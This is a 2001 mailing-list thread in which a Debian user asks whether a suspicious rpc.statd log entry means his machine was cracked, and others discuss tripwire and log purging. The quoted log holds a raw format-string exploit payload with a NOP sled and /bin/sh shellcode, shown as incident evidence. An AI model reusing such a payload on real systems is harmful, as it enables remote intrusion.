[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: was I cracked? (rpc.statd, new version)

Erm.. I apologize up front if while skimming this thread missed it, but
I didn't see that he HAD tripwire before the questionable event.
Tripwire is only good if you've got it installed and secure on RO media
before you let anyone else on the box. Having just setup tripwire for
this type of thing, and having been cracked before with my tripwire
nonfunctional, I know of what I speak. You really need the good tripwire
DB to compare something to. Tripwire will only tell Lukas that 'yes,
these are nice files, I will compare them to the next ones I see' -
tripwire wont know any better.

Again, this entire message predicated on the fact that I didn't recall
seeing evidence that Lukas had tripwire installed already. 

j

On Wed, Jul 11, 2001 at 07:01:20PM -0400, kath wrote:
> You can check for modified binaries with tripwire.
> 
> If this was a decent hacker or even a script kiddie using a good tool, they
> probably would have purged your logs of all evidence.
> 
> So either:
> 
> a) They are second rate
> or
> b) They didn't get in
> 
> - k
> On Wed, 11 Jul 2001, Lukas Eppler wrote:
> 
> > I have the following entries in /var/log/messages:
> >
> > Jul  9 01:21:03 blue -- MARK --
> > Jul  9 01:21:11 blue
> > Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> >
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7>
> <FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%
> n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220
> > Jul  9 01:21:11 blue
> >
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>\200
> <B0>^A<CD>\200<E8>\177<FF><FF><FF>
> > Jul  9 01:41:03 blue -- MARK --
> >
> > I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known
> > exploit fixed. I can't find modified binaries or any strange behaviour...
> was
> > this a defeated attack? The second line says /bin/sh somewhere which makes
> me
> > a bit concerned... Was I cracked?
> >
> > Lukas
Reply to: